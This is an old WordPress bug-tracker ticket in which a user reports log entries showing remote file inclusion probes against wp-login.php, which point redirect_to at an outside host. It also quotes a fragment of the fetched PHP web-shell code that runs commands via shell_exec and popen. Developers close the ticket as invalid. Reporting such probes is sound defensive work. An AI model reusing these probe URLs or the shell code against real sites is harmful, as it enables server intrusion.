Make WordPress Core

Opened 8 years ago

Closed 8 years ago

#5548 closed defect (bug) (invalid)

Hacking attempt.

Reported by: mylesab Owned by:
Milestone: Priority: normal
Severity: normal Version:
Component: Security Keywords:
Focuses: Cc:


Today I noticed the following entries in my log: - - [29/Dec/2007:12:18:14 -0600] "GET /blog/archives/2006/microid-wordpress-plugin//wp-login.php?redirect_to=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 2066 "-" "libwww-perl/5.805" - - [29/Dec/2007:12:18:14 -0600] "GET //wp-login.php?redirect_to=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 2015 "-" "libwww-perl/5.805" - - [29/Dec/2007:12:18:15 -0600] "GET /blog/archives/2006//wp-login.php?redirect_to=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 2041 "-" "libwww-perl/5.805"

When I curl the id.txt file I got the following:

echo "Mic22";
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
$res = join("\n",$res);
$res = @shell_exec($cfe);
$res = @ob_get_contents();
$res = @ob_get_contents();
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
return $res;

Change History (2)

comment:1 @ryan8 years ago

Not sure what they're trying to accomplish with this. redirect_to doesn't do an include. Also, we block attempts to launder links through redirect_to.

comment:2 @JeremyVisser8 years ago

  • Milestone 2.5 deleted
  • Resolution set to invalid
  • Status changed from new to closed

This is not really a proper bug report, nor anything that should concern WordPress users. All WP blogs get hammered by useless $cript k1dd1e bots that really don't get anywhere.

Note: See TracTickets for help on using tickets.